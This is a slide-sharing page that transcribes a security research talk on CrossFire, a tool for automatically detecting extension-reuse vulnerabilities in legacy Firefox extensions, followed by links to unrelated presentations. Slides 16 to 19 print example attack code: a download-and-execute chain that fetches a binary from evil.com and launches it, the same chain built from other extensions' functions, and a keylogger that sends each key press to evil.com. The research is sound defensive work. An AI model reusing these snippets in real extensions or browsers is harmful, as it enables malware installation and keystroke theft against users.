automated detection of firefox extension reuse
play

Automated Detection of Firefox Extension- Reuse Vulnerabilities - PowerPoint PPT Presentation

Oct 05, 2022 •319 likes •660 views

Automated Detection of Firefox Extension- Reuse Vulnerabilities Click to edit Master text styles Second level Third level Fourth level Fifth level Ahmet S BUYUKKAYHAN William ROBERTSON Who are we? Click to edit

  1. Automated Detection of Firefox Extension- Reuse Vulnerabilities • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level Ahmet S BUYUKKAYHAN William ROBERTSON

  2. Who are we? • Click to edit Master text styles • Assistant professor of computer science at Northeastern — Second level University in Boston, MA • Co-directs the NEU Systems Security Lab with Engin Kirda • Third level — Fourth level • Systems, network, and software security researcher » Fifth level • Past winner of DEFCON CTF with Shellphish – (a long, long time ago…) 2

  3. Who are we? • Click to edit Master text styles • PhD Candidate at Northeastern University — Second level – Authored peer-reviewed conference and journal papers in top-tier security venues • Third level • Member of the NEU Systems Security Lab — Fourth level » Fifth level 3

  4. Singapore • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level 4

  5. Boston • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level 5

  6. Agenda • Click to edit Master text styles • Background — Second level • Third level • Extension-Reuse Attacks — Fourth level • CrossFire & Demo » Fifth level • Evaluation • Conclusion 6

  7. • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level Background

  8. Browser Extensions • Click to edit Master text styles • Add new capabilities, — Second level customization to browsers • Third level • ~15K extensions in Mozilla — Fourth level Add-ons repository » Fifth level • Popular ones have millions of users • Mostly written in JavaScript 8

  9. Legacy Firefox Extensions • Click to edit Master text styles • Shared JavaScript namespace — Second level – Extensions can read/write objects or variables of others – Can invoke functionality of others • Third level • Shared window — Fourth level XUL XUL XUL – Read/write GUI elements » Fifth level JavaScript – Listen to all events • No privilege separation XPCOM – Full access to filesystem, network… File System Network 9

  10. Threat Model • Click to edit Master text styles • The browser is an attractive target — Second level – Extension authors are untrusted • Vulnerable extensions can be exploited • Third level – “Benign-but-buggy” threat model — Fourth level • Malicious extensions are a real threat » Fifth level – Trick users into installing malicious 161 malicious extensions extensions are blocked – Powerful (“man-in-the-browser” attacks) by Mozilla + – Easy to develop, difficult to detect + https://addons.mozilla.org/en-US/firefox/blocked/ – Feb 2016 10

  11. Existing Methods for Protection • Click to edit Master text styles • Enforcing browser — Second level marketplaces for extensions – Automated analysis • Third level – Human reviews — Fourth level – Extension signing » Fifth level – “Vetting” • Extension isolation – Least privilege and policy-based enforcement 11

  12. Add-on SDK (a.k.a., Jetpack) • Click to edit Master text styles • Introduced in 2009 — Second level October 2014 • Isolates extensions from each other 12.0% of the top 2,000 • Third level • Separate content and core scripts — Fourth level March 2016 22.9% of the top 2,000 • Implements principle of least » Fifth level privilege Release Date of • But, adoption has been slow WebExtensions in Q3 2016 • Superseded by WebExtensions 12

  13. • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level Extension-Reuse Attacks

  14. Attack Model • Click to edit Master text styles — Second level Evil Extension Evil Extension (No Sensitive Calls) • Third level Extension X Extension Y — Fourth level No Suspicious Behavior » Fifth level Sensitive Calls Sensitive Calls Vetting Sandbox Victim`s Browser 14

  15. Impact • Click to edit Master text styles • Lack of isolation leaves legacy — Second level extensions defenseless against capability leaks • Third level • Attackers can stitch together — Fourth level exploits by abusing capabilities » Fifth level • The more power vulnerable extensions have, the easier it is for an evil extension 15

  16. Download & Execute Evil Binary • Click to edit Master text styles const WebBrowserPersist = Components.Constructor( — Second level "@mozilla.org/embedding/browser/nsWebBrowserPersist;1", "nsIWebBrowserPersist"); • Third level var persist = WebBrowserPersist(); — Fourth level var targetFile = Components.classes["@mozilla.org/file/local;1"] » Fifth level .createInstance(Components.interfaces.nsILocalFile); targetFile.initWithPath(“evil.bin"); persist.saveURI( “http://evil.com/evil.bin", null, null, null, "", targetFile, null); targetFile.launch(); 16

  17. Extension-reuse Attack Example • Click to edit Master text styles var files = [{ Extension — Second level href: $url, description: "", Download Execute • Third level fname: $path, noRedir: true — Fourth level Extension X Extension Y }]; » Fifth level gFlashGotService.download(files); var gPrefMan = new GM_PrefManager(); File Internet gPrefMan.setValue(“editor”, $path); System GM_util.openInEditor(); Exe 17

  18. To Reuse or Not To Reuse • Click to edit Master text styles const WebBrowserPersist = var files = [{ Components.Constructor("@mozilla.org — Second level href: $url, /embedding/browser/nsWebBrowserPersi description: "", st;1", "nsIWebBrowserPersist"); • Third level fname: $path, var persist = WebBrowserPersist(); noRedir: true var targetFile = — Fourth level }]; Components.classes["@mozilla.org/fil » Fifth level gFlashGotService.download(files); e/local;1"].createInstance(Component s.interfaces.nsILocalFile); targetFile.initWithPath( $path ); var gPrefMan = new GM_PrefManager(); persist.saveURI( $url , null, null, gPrefMan.setValue(“editor”, $path); null, "", targetFile, null); GM_util.openInEditor(); targetFile.launch(); 18

  19. Another Example • Click to edit Master text styles • A key logger, which sends each key press to evil.com — Second level gd12.dicInline.urlWikPrefix = "http://evil.com/GD12_YOUR_LANG/steal.php?key="; • Third level gd12.keydownHandler = function(e) { gd12.dicInline.lookupWikt(String.fromCharCode(e.which), false, false); — Fourth level }; » Fifth level gd12.init(); Evil.com Internet 19

  20. • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level CrossFire

  21. CrossFire Overview • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level 21

  22. DEMO • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level 22

  23. • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level Evaluation

  24. Method • Click to edit Master text styles • Top 10 most downloaded extensions — Second level – Manual analysis on all set • Top 2000 most downloaded extensions • Third level – Manual analysis on random set of 323 — Fourth level » Fifth level • Case Study – Developed an extension with cross- extension function call – Applied to full review 24

  25. Top 10 Firefox Extensions • Click to edit Master text styles Extension Name Automated Exploits Manual Exploits False Positives # of Users Adblock Plus 0 0 4 22 M — Second level Video DownloadHelper 0 15 0 6.5 M • Third level Firebug 0 1 0 3 M — Fourth level NoScript 2 5 2 2.5 M DownThemAll! 0 5 0 1.5 M » Fifth level Greasemonkey 1 3 2 1.5 M Web of Trust 1 33 15 1.3 M Flash Video Down. 4 1 1 1.3 M FlashGot Mass Down. 3 5 9 1.3 M Down. YouTube Videos 0 2 1 1 M 25

  26. Summary of Results • Click to edit Master text styles Detected Vulnerabilities – Random Set Positive Vulnerabilities by Attack Type — Second level True Positives False Positives Manual Automated • Third level — Fourth level 51 96 20% 27% » Fifth level 255 204 73% 80% 26

  27. Breakdown of Positive Vulnerabilities • Click to edit Master text styles Category Description Positive Vulnerabilities By Category — Second level File I/O Code Execution Execute binary or JS 16% Event Listener • Third level File I/O Read from/write to Registration Filesystem 12% — Fourth level Network Access Open a URI or download a file Preference » Fifth level Access Preference Access Read/write browser 3% settings Event Listener Reg. Key logging events only Code Execution 3% Network Access 66% 27

  28. Performance • Click to edit Master text styles • Fast static analysis — Second level – ~ 1 sec average (per extension) • Third level Min Q1 Median Mean Q3 Max 0.05s 0.18s 0.28s 1.06s 0.51s 763.91s — Fourth level » Fifth level • Fast exploit generation – ~ 380 secs (~ 6 mins) on average (per exploit) Min Q1 Median Mean Q3 Max 30s 192s 270s 378.6s 550.8 2160s 28

Recommend

TRACER TUTORIAL: TEXT REUSE DETECTION INTRODUCTION TO HISTORICAL TEXT REUSE DETECTION M arco B

TRACER TUTORIAL: TEXT REUSE DETECTION INTRODUCTION TO HISTORICAL TEXT REUSE DETECTION M arco B

TRACER TUTORIAL: TEXT REUSE DETECTION INTRODUCTION TO HISTORICAL TEXT REUSE DETECTION M arco B uchler, Emily Franzini and Greta Franzini TABLE OF CONTENTS 1. Who am I? 2. What is text reuse? 3. Aspects of text reuse 4. ACID for the Digital

584 views • 34 slides
Automated fault detection for Automated fault detection for Autosub6000: Autosub6000: What we've

Automated fault detection for Automated fault detection for Autosub6000: Autosub6000: What we've

Automated fault detection for Automated fault detection for Autosub6000: Autosub6000: What we've achieved in a year? TSEM talk @ Institute of Cybernetics, Tallinn, Estonia Juhan Ernits, March 9, 2010 Overview of todays talk Overview of today s

490 views • 26 slides
By JoseeAntonioR INDEX OF CONTENTS 1.- What is Firefox? 2.- Uses of Firefox 3.- How To:

By JoseeAntonioR INDEX OF CONTENTS 1.- What is Firefox? 2.- Uses of Firefox 3.- How To:

Introduction to Firefox By JoseeAntonioR INDEX OF CONTENTS 1.- What is Firefox? 2.- Uses of Firefox 3.- How To: Download Files 4.- How To: History 5.- How To: Tabbing 6.- How To: App Tabs 7.- How To: Set Homepage 8.- How To: Block

557 views • 16 slides
Moving Forward Using Automated Measures for Lameness Detection Nria Chapinal, PhD Animal

Moving Forward Using Automated Measures for Lameness Detection Nria Chapinal, PhD Animal

Moving Forward Using Automated Measures for Lameness Detection Nria Chapinal, PhD Animal Welfare Program, UBC April 14, 2010 Outline Introduction Visual/subjective methods of detection Automated methods of detection Examples

905 views • 47 slides
TRACER TUTORIAL: TEXT REUSE DETECTION RECENT WORK M arco B uchler, Emily Franzini and Greta

TRACER TUTORIAL: TEXT REUSE DETECTION RECENT WORK M arco B uchler, Emily Franzini and Greta

TRACER TUTORIAL: TEXT REUSE DETECTION RECENT WORK M arco B uchler, Emily Franzini and Greta Franzini METHODOLOGY Basic idea: Embed historical text reuse in Shannons N oisy Channel theorem. 2/26 MICROVIEW II Source: Stefan J anicke,

433 views • 26 slides
1 Infrastructure Requirements Limit Reuse Planned Indirect Potable Reuse (Purple pipe may be a

1 Infrastructure Requirements Limit Reuse Planned Indirect Potable Reuse (Purple pipe may be a

Overview of Presentation DIRECT POTABLE REUSE: A PATH FORWARD: Take Home Message Reuse Opportunities De Facto and Planned Indirect Potable Reuse 2012 WATER REUSE CONFERENCE Proposed Direct Potable Reuse Strategies Boise, ID

599 views • 8 slides
Continuous Localization Agenda Brief History Q&A 1. 4. How we shipped Firefox Continuous

Continuous Localization Agenda Brief History Q&A 1. 4. How we shipped Firefox Continuous

Continuous Localization Agenda Brief History Q&A 1. 4. How we shipped Firefox Continuous L10n 2. Localizing Firefox Nightly 3. Android Analysis of our Android Apps Public 2 Shipping Localized Firefox over time Public 3 The

212 views • 18 slides
Firefox POCs BUG 612029: Remote denial of Service POC Actual POC comes from: BUG 833874 Eats

Firefox POCs BUG 612029: Remote denial of Service POC Actual POC comes from: BUG 833874 Eats

Firefox POCs BUG 612029: Remote denial of Service POC Actual POC comes from: BUG 833874 Eats up memory! Notice no unresponsive script dialogue Firefox version 13 In current firefox version -- warning + debug option, no

254 views • 12 slides
SURFnet IDS / OS3 UvA Project Extension of the SURFnet Intrusion Detection System Sensors to

SURFnet IDS / OS3 UvA Project Extension of the SURFnet Intrusion Detection System Sensors to

SURFnet IDS / OS3 UvA Project Extension of the SURFnet Intrusion Detection System Sensors to Microsoft Windows XP Michael Rave Coen Steenbeek 7 February 2007 Extension of the SURFnet Intrusion Detection System Sensors to Microsoft Windows XP

203 views • 18 slides
S MV -H UNTER : Large Scale, Automated Detection of SSL/TLS Man-in-the-Middle Vulnerabilities in

S MV -H UNTER : Large Scale, Automated Detection of SSL/TLS Man-in-the-Middle Vulnerabilities in

S MV -H UNTER : Large Scale, Automated Detection of SSL/TLS Man-in-the-Middle Vulnerabilities in Android Apps David Sounthiraraj Justin Sahs Garret Greenwood Zhiqiang Lin Latifur Khan University of Texas at Dallas February 26, 2014

671 views • 40 slides
Firefox quality Mozilla Paris | FOSDEM | Feb 3rd 2018 Bonjour ! Je suis Sylvestre Ledru Je

Firefox quality Mozilla Paris | FOSDEM | Feb 3rd 2018 Bonjour ! Je suis Sylvestre Ledru Je

Firefox quality Mozilla Paris | FOSDEM | Feb 3rd 2018 Bonjour ! Je suis Sylvestre Ledru Je parle de Firefox Quality Twitter @SylvestreLedru 2 Bonjour ! 3 Bonjour ! 4 Bonjour ! 5 The Firefox scale About:Firefox We release every 6

775 views • 41 slides
Python for Informatics Database Handout Download and install FireFox and the SQLite Manager

Python for Informatics Database Handout Download and install FireFox and the SQLite Manager

Python for Informatics Database Handout Download and install FireFox and the SQLite Manager http://www.mozilla.org/enUS/firefox/new/ https://addons.mozilla.org/enUS/firefox/addon/sqlitemanager/ Queries insert into Users (name, email) values

503 views • 3 slides
Introduction to Historical Text Reuse Detection Marco Bchler, Emily Franzini, Greta Franzini,

Introduction to Historical Text Reuse Detection Marco Bchler, Emily Franzini, Greta Franzini,

Introduction to Historical Text Reuse Detection Marco Bchler, Emily Franzini, Greta Franzini, Maria Moritz eTRAP Research Group Gttingen Centre for Digital Humanities Institute of Computer Science Georg August University Gttingen, Germany

714 views • 25 slides
A new version of Firefox is available Rapid Release of Quality Firefox Products Lukas Blakk

A new version of Firefox is available Rapid Release of Quality Firefox Products Lukas Blakk

A new version of Firefox is available Rapid Release of Quality Firefox Products Lukas Blakk & Sylvestre Ledru Who are we ? Sylvestre Lukas Has been at Mozilla for a year Mozillian since 2006 Debian Developer Release

462 views • 30 slides
SlowFuzz: Automated Domain-Independent Detection of Algorithmic Complexity Vulnerabilities

SlowFuzz: Automated Domain-Independent Detection of Algorithmic Complexity Vulnerabilities

SlowFuzz: Automated Domain-Independent Detection of Algorithmic Complexity Vulnerabilities Theofilos Petsios , Jason Zhao, Angelos D. Keromytis, and Suman Jana Columbia University ACM Conference on Computer and Communications Security (CCS)

563 views • 38 slides
Towards Automated Melanoma Detection with Deep Learning: Data Purification and Augmentation

Towards Automated Melanoma Detection with Deep Learning: Data Purification and Augmentation

Motivation Related work Proposed approach Empirical results Conclusion Towards Automated Melanoma Detection with Deep Learning: Data Purification and Augmentation Devansh Bisla , Anna Choromanska, Russell S. Berman, Jennifer A. Stein, David

359 views • 15 slides
Automated microscopy system for detection and genetic characterization of fetal nucleated red

Automated microscopy system for detection and genetic characterization of fetal nucleated red

Header for SPIE use Automated microscopy system for detection and genetic characterization of fetal nucleated red blood cells on slides. Ilya Ravkin and Vladimir Temov * Applied Imaging Corp., 2380 Walsh Avenue, Bldg. B, Santa Clara, CA 95051

263 views • 12 slides
Text Reuse Detection Using a Composition of Text Similarity Measures Br, Zesch, Gurevych 2012

Text Reuse Detection Using a Composition of Text Similarity Measures Br, Zesch, Gurevych 2012

Text Reuse Detection Using a Composition of Text Similarity Measures Br, Zesch, Gurevych 2012 HS Computational study of Sabrina Galasso linguistic differences sabrina.galasso@student.uni-tuebingen.de December 16th, 2015 HS LingDiff 1 1.

1.46k views • 32 slides
TRACER TUTORIAL: TEXT REUSE DETECTION SELECTION Mar co B uchler, Emily Franzini and Greta

TRACER TUTORIAL: TEXT REUSE DETECTION SELECTION Mar co B uchler, Emily Franzini and Greta

TRACER TUTORIAL: TEXT REUSE DETECTION SELECTION Mar co B uchler, Emily Franzini and Greta Franzini TABLE OF CONTENTS 1. Wha t is Selection? 2. Selection techniques 3. Hacking 4. Conclusion and revision 2/29 REMINDER: CURRENT APPROACH 3/29

321 views • 29 slides
Software Reuse From informal reuse (scavenging) to systematic reuse Management and technical

Software Reuse From informal reuse (scavenging) to systematic reuse Management and technical

Software Reuse From informal reuse (scavenging) to systematic reuse Management and technical issues Michal Young, SERC 05/19/99 1 Merry-Go-Round of Sequential Development Conventional view of development: Requirements Common theme -

238 views • 13 slides
Cordova and Firefox OS HTML5 for the Mobile Web Jason Weathersby Cordova and Firefox OS

Cordova and Firefox OS HTML5 for the Mobile Web Jason Weathersby Cordova and Firefox OS

Cordova and Firefox OS HTML5 for the Mobile Web Jason Weathersby Cordova and Firefox OS Click Here For Presentation 11/13/14 2 Title Here

190 views • 3 slides
Bruteforcing in the Shadows Evading Automated Detection Martin Draar, Jan Vykopal

Bruteforcing in the Shadows Evading Automated Detection Martin Draar, Jan Vykopal

Bruteforcing in the Shadows Evading Automated Detection Martin Draar, Jan Vykopal {drasar|vykopal}@ics.muni.cz Institute of Computer Science Masaryk University Brno, Czech Republic FloCon 2012 January 12, Austin, Texas Part I Network

898 views • 22 slides
Hardening the Firefox browser Preventing unwanted background traffic to Google, Pocket and hidden

Hardening the Firefox browser Preventing unwanted background traffic to Google, Pocket and hidden

Hardening the Firefox browser Preventing unwanted background traffic to Google, Pocket and hidden telemetry to Mozilla Per Foyer per@foyer.se 10 10 Cryptoparty 201911-R1 Hardening Firefox: Method To harden Firefox we need to: 1. Adjust

470 views • 14 slides
Automated Acquisition of Linguistic Knowledge for Robust Multilingual Grammar Development Valia

Automated Acquisition of Linguistic Knowledge for Robust Multilingual Grammar Development Valia

Introduction Acquisition of MWEs: Theoretical Background & Motivation Detection of MWEs candidates Evaluation of the Identification of MWEs Extension of the English Resource Grammar with MWEs Enhancing Robustness of the German Grammar

1.06k views • 103 slides

More recommend